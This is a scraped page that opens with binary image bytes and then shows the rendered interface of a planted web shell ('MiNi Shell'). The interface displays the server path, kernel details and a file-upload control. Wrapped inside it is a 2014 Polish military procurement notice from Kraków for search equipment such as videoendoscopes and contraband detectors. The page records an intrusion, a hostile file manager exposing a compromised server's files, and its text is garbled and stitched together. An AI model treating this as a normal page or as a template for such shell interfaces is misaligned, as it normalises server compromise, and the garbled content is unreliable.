JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140922/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140922/313310-N-2014.html

<p class="kh_header"><b>Kraków: Dostawa zestawów do przeszukań.</b><br>
<b>Numer ogłoszenia: 313310 - 2014; data zamieszczenia: 22.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4228 , ul. Montelupich 3, 30-901 Kraków, woj. małopolskie, tel. 12 455 75 53, faks 12 455 75 53.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zamowienia.3rblog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa zestawów do przeszukań..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa niżej wymienionych urządzeń do przeszukań realizowana zgodnie wymaganiami Zamawiającego zwartymi we wzorze umowy (załącznik nr 5 do SIWZ);
2. Dostarczone urządzenia muszą być produktem klasy I (fabrycznie nowym), być wyprodukowanym najwcześniej w 2013 roku, spełniać wymagania jakościowe dla tego typu wyrobów.
3. Odbioru jakościowego w imieniu Zamawiającego dla zadań od 1 do 4, dokona Rejonowe Przedstawicielstwo Wojskowe - wskazane przez Zamawiającego, poświadczając ten fakt podpisem na protokole odbioru. W procedurze tej dopuszcza się udział przedstawiciela Zamawiającego i Odbiorcy.
4. Fakt podpisania protokołu odbioru przez przedstawiciela RPW nie zwalnia Wykonawcy z obowiązku dostarczenia przedmiotu zamówienia zgodnie 
z wymaganiami umowy.
5. Konstrukcja i właściwości urządzeń powinny umożliwić ich eksploatację przez całą dobę niezależnie warunków atmosferycznych;
6. Zamawiający dopuszcza realizację zamówienia w częściach (zadaniach):
   Zadanie 1 - 3 (trzy) zestawy lusterek inspekcyjnych.
   Zadanie 2 - 3 (trzy) komplety videoendoskopów.
   Zadanie 3 - 3 (trzy) detektory przemytu.
   Zadanie 4 - 3 (trzy) komplety ręcznych lamp (latarek) UV.
   Zadanie 5 - 3 (trzy) komplety laserowych mierników odległości.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 35.12.10.00-8, 38.41.00.00-2, 38.58.10.00-1, 38.00.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium przed  upływem terminu składania ofert tj. do dnia 03.10.2014 r. do godz. 10:00, jedynie w odniesieniu do zadań 2 i 3 
w wysokości: 
Zadanie 2 - 6 500,00 zł
Zadanie 3 - 2 500,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oryginał lub poświadczona kopia certyfikatu AQAP 2130 dostawcy lub pisemne zobowiązanie (oświadczenie) dostawcy do stosowania wymagań AQAP 2130 przy realizacji niniejszej dostawy i wyrażenia zgody na prowadzenie procesu rządowego zapewnienia jakości.
2. Karty katalogowe na oferowane produkty (zawierające m.in. informację 
o producencie, typie urządzenia oraz jego parametrach). 
3. Oryginał lub kopię pełnomocnictwa:
a) dla osoby/osób podpisującej/cych ofertę do podejmowania zobowiązań 
w imieniu wykonawcy składającego ofertę, gdy prawo do podpisania oferty nie wynika z innych dokumentów do niej załączonych (np. z aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, odpisu 
z właściwego rejestru). 
b) dla ustanowionego pełnomocnika, do reprezentowania w postępowaniu  albo do reprezentowania w postępowaniu i zawarcia umowy - dotyczy wykonawców wspólnie ubiegających się o udzielenie zamówienia. Zgodnie z art. 23 ust. 2 ustawy wykonawcy ubiegający się wspólnie o udzielenie zamówienia zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy.

Wymagana jest forma, rodzaj i zakres pełnomocnictwa właściwy do poszczególnych czynności. W przypadku złożenia kopii pełnomocnictwa, musi być ona potwierdzona za zgodność z oryginałem notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zamowienia.3rblog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 4228
ul. Montelupich 3
30-901 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.10.2014 godzina 10:00, miejsce: Jednostka Wojskowa 4228
ul. Montelupich 3
30-901 Kraków
(kancelaria jawna).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1: 
3 (trzy) zestawy lusterek inspekcyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pojedynczy zestaw lusterek inspekcyjnych powinien składać się z niżej wymienionych elementów:
- Ramię teleskopowe długości po złożeniu max. 45 cm i po rozłożeniu min 145 cm ze stałym podświetleniem LED (bryzgoszczelnym) 
i ruchomą głowicą (uchwytem) umożliwiającą zamontowanie niżej wymienionych akcesoriów wchodzących w skład zestawu;
- Lusterko inspekcyjne O 35 ÷ 45 mm;
- Lusterko inspekcyjne O 55 ÷ 70 mm;
- Lusterko inspekcyjne O 130 ÷ 150 mm;
- Lusterko inspekcyjne wypukłe O 130 ÷ 150 mm;
- Lusterko inspekcyjne prostokątne 55 ÷ 65 mm x 100 ÷ 120 mm;
- Magnes neodymowy do odzyskiwania (wydobywania) elementów metalowych;
- Trwałe opakowanie, zabezpieczające przed uszkodzeniami mechanicznymi, wpływem czynników zewnętrznych (woda, zapylenie) oraz umożliwiające przechowywanie i przenoszenie w.wym. zestawu;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.12.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2:
3 (trzy) komplety videoendoskopów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Videoendoskop z giętką końcówką i wyświetlaczem LCD posiadającym możliwość sterowania kątem odchylenia końcówki roboczej z możliwością utrwalania obrazu w postaci zdjęć i filmów video zapisywanych w pamięci zewnętrznej o właściwościach:
- Kolorowy wyświetlacz LCD o przekątnej 3,5÷4 cala oraz rozdzielczości 640 x 480 pixeli;
- Możliwość sterowania końcówką roboczą w płaszczyznach prawo/lewo min 100o, odchylenie końcówki w pionie góra/dół min 100 st.;
- Kąt widzenia min 70o w płaszczyźnie poziomej i pionowej;
- Mechanizm sterowania końcówką roboczą umożliwiający blokadę artykulacji sondy (trwałego ukierunkowania obrazu z sondy) 
z możliwością robienia zdjęć i nagrywania filmów;
- Możliwość kopiowania, usuwania plików i folderów, możliwość dokonywania notatek, opisów zdjęć, możliwość automatycznego dodawania do plików zdjęć daty i godziny ich wykonania;
- Płynny zoom min 3x;
- Średnica końcówki roboczej max O 6,2 mm;
- Długość końcówki roboczej (sondy) 1,5 ÷ 2 m;
- Rozdzielczość zdjęć nie mniejsza niż 640 x 480 pixeli (format JPG);
- Rozdzielczość filmów nie mniejsza niż 320 x 240 pixeli (kompresja MPEG 4);
- Dodatkowe oprogramowanie umożliwiające przetwarzanie na PC zebranego materiału, jego edycję (dodawanie notatek, zaznaczeń) oraz katalogowanie i archiwizowanie;
- Zapis obrazu w pamięci wewnętrznej typu flash z możliwością przesłania na PC poprzez złącze USB 2,0 (kabel w komplecie) lub zewnętrznej na kartach SD/SDHC, pamięci zewnętrznej typu pendrive nie mniejszej 2 GB;
- Zasilanie akumulatorowe zapewniające pracę urządzenia w trybie ciągłym przez min. 2 godziny na jednym komplecie akumulatorów;
- Roboczy zakres temperatur zewnętrznych od -25oC do 45oC;
- 2 kpl. akumulatorów litowo-jonowych z ładowarką;
- Możliwość zasilania urządzenia z sieci ~ 230 V (poprzez zasilacz);
- Wydajne oświetlenie (zamontowane w sodzie) o sterowanym natężeniu ręcznym i automatycznym, umożliwiającym prowadzenie inspekcji w całkowitej ciemności;
- System obrazu video PAL;
- Wzmocniona konstrukcja sondy zwiększająca jej odporność na uszkodzenia mechaniczne;
- Zwiększona odporność urządzenia na pracę w środowiskach niebezpiecznych (słona woda, benzyna, olej napędowy, inne materiały ropopochodne, opary zapylenie), spełniające wymagania normy MIL - STD 810 F;
- Możliwość samodzielnego podłączenia do urządzenia (przez użytkownika) innych sond (kompatybilnych z urządzeniem, ale 
o innych długościach, sondy wymienne);
- Instrukcja obsługi i konserwacji urządzenia w języku polskim;
- Waga videoendoskopu z zamontowanymi akumulatorami gotowego do pracy, nie większa niż 2 kg;
- Trwałe opakowanie, zabezpieczające przed uszkodzeniami mechanicznymi, wpływem czynników zewnętrznych (woda, zapylenie) oraz umożliwiające przechowywanie i przenoszenie w.wym. zestawu (wraz z dodatkowymi akumulatorami, ładowarką, zasilaczem okablowaniem itp.).

W ramach realizacji zamówienia Wykonawca przeprowadzi nieodpłatne szkolenie z obsługiwania i bezpiecznego użytkowania dostarczonych urządzeń wg zaakceptowanego przez Zamawiającego planu szkolenia 
w miejscu jego dostawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.41.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3:
3 (trzy) detektory przemytu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Detektor przemytu - ręczne urządzenie emitujące wiązkę promieniowania gamma, umożliwiającego wykrycie i analizę różnic w gęstości badanego materiału poprzez porównanie z danymi wzorcowymi zapisanymi w pamięci urządzenia o właściwościach:
- Umożliwiający wykrywanie materiałów wybuchowych, radioaktywnych, broni, narkotyków, oraz ukrytych przestrzeni (schowków);
- Powinien posiadać zdolność przenikania w różnych rodzajach metalu (stal, aluminium, miedź i ich stopy), tworzywach sztucznych, gumie 
i drewnie;
- Waga urządzenia gotowego do pracy wraz z akumulatorami 
do 2 kg;
- Wyświetlacz LCD z podświetleniem;
- Wzmocniona konstrukcja urządzenia zwiększająca jego odporność na uszkodzenia mechaniczne, upadek;
- Zwiększona odporność urządzenia na pracę w środowiskach niebezpiecznych (słona woda, benzyna, materiały ropopochodne, opary, zapylenie);
- Wyjście audio dla słuchawek;
- Zasilanie akumulatorowe zapewniające pracę urządzenia w trybie ciągłym przez min. 3 godziny na jednym komplecie akumulatorów;
- 2 kpl. akumulatorów litowo-jonowych z ładowarką; 
- Roboczy zakres temperatur zewnętrznych od -15oC do 45oC;
- Czas aktywności źródła promieniowania przenikliwego pozwalającego na prawidłową pracę urządzenia: min. 10 lat.
- Alarm dźwiękowy; 
- Trwałe opakowanie, zabezpieczające przed uszkodzeniami mechanicznymi, wpływem czynników zewnętrznych (woda, zapylenie) oraz umożliwiające przechowywanie i przenoszenie w.wym. zestawu (wraz z dodatkowymi akumulatorami, ładowarką).

W ramach realizacji zamówienia Wykonawca przeprowadzi nieodpłatne szkolenie z obsługiwania i bezpiecznego użytkowania dostarczonych urządzeń wg zaakceptowanego przez Zamawiającego planu szkolenia 
w miejscu jego dostawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.58.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4: 
3 (trzy) komplety ręcznych lamp (latarek) UV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ręczna lampa (latarka) UV o właściwościach:
- Źródło światła: dioda LED;
- Regulowany zoom;
- Zasięg min 100 m;
- Strumień światła min 320 lm;
- Długość fali światła: 315÷400nm;
- Wzmocniona konstrukcja lampy zwiększająca jej odporność na uszkodzenia mechaniczne, upadek;
- Zwiększona odporność lampy na pracę w środowiskach niebezpiecznych (słona woda, benzyna, materiały ropopochodne, opary, zapylenie);
- Zasilanie akumulatorowe zapewniające pracę urządzenia w trybie ciągłym przez min. 3 godziny na jednym komplecie akumulatorów;
- 2 kpl. akumulatorów litowo-jonowych z ładowarką;
- Trwałe opakowanie, zabezpieczające przed uszkodzeniami mechanicznymi, wpływem czynników zewnętrznych (woda, zapylenie) oraz umożliwiające przechowywanie i przenoszenie lampy (latarki).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5:
3 (trzy) komplety laserowych mierników odległości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Laserowy miernik odległości o właściwościach:
- Zasięg dokonywanego pomiaru min 40 m;
- Możliwość automatycznego obliczania powierzchni i kubatury;
- Pamięć dokonanych pomiarów;
- Znacznik np. laserowy, kierunku (punktu) dokonywania pomiaru;
- Wzmocniona konstrukcja miernika zwiększająca jego odporność na uszkodzenia mechaniczne, upadek;
- Zwiększona odporność miernika na pracę w środowiskach niebezpiecznych (słona woda, benzyna, materiały ropopochodne, opary, zapylenie);
- Zasilanie akumulatorowe zapewniające pracę urządzenia w trybie ciągłym przez min. 3 godziny na jednym komplecie akumulatorów; Roboczy zakres temperatur zewnętrznych od -10oC do 40oC;
- 2 kpl. akumulatorów litowo-jonowych z ładowarką;
- Trwałe opakowanie, zabezpieczające przed uszkodzeniami mechanicznymi, wpływem czynników zewnętrznych (woda, zapylenie) oraz umożliwiające przechowywanie i przenoszenie ww. zestawu (wraz z dodatkowymi akumulatorami, ładowarką)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com